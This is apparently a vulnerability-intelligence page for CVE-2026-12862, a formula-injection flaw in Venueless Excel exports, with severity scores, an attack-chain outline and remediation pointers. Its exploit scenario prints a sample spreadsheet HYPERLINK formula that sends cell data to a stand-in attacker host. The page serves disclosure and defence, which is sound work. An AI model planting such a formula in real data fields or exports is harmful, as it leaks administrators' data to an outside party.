Skip to main content

Venueless CVE-2026-12862

| EUVDEUVD-2026-38220 MEDIUM
Improper Neutralization of Input Leaders (CWE-148)
2026-06-22 rami.io
5.1
CVSS 4.0 · Vendor: rami.io
Share

Severity by source

Vendor (rami.io) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Network-delivered via web app, low complexity; PR:L for required account; UI:R for admin file open; S:C for formula execution in admin's spreadsheet environment; C:L for potential cell-data exfiltration.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (rami.io).

CVSS VectorVendor: rami.io

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

2
Patch available
Jun 22, 2026 - 11:16 EUVD
Analysis Generated
Jun 22, 2026 - 10:16 vuln.today

DescriptionCVE.org

Untrusted user data was passed verbatim to Excel exports for administrators. This allowed formula injection which can be used to compromise the environment of the user loading the file or other data in the file.

AnalysisAI

Formula injection in Venueless Excel exports allows an attacker with a low-privilege account to embed malicious spreadsheet formulas into user-supplied data fields, which execute when an administrator opens the generated export file. Affected deployments include all versions of Venueless (pretix) as indicated by the wildcard CPE entry. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register low-privilege Venueless account
Delivery
Submit formula payload in user data field
Exploit
Admin triggers Excel data export
Execution
Admin opens exported spreadsheet file
Persist
Spreadsheet engine evaluates injected formula
Impact
Exfiltrate data or execute attacker-defined action

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold a low-privilege authenticated account on the Venueless instance sufficient to submit data that is included in administrator-generated Excel exports (PR:L per CVSS vector). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.1 (Medium) is consistent with the constrained impact profile: the attack requires a low-privilege user account (PR:L) and passive administrator interaction (UI:P - the admin must export and open the file), and the direct integrity impact on the vulnerable system is rated Low (VI:L) with no confidentiality or availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a low-privilege account on a Venueless instance and enters a crafted formula string such as =HYPERLINK("http://attacker.example/exfil?d="&ENCODEURL(A2),"click") into a user profile or event submission field. When a Venueless administrator later generates an Excel export of participant data and opens the file in Microsoft Excel, the formula is automatically evaluated, silently transmitting cell contents to the attacker's server. …
Remediation Consult the vendor security advisory at https://github.com/venueless/venueless/security/advisories/GHSA-5hw3-655h-7m86 for the patched release version and upgrade instructions; no specific fixed version was confirmed in the data available at time of analysis. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12862 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy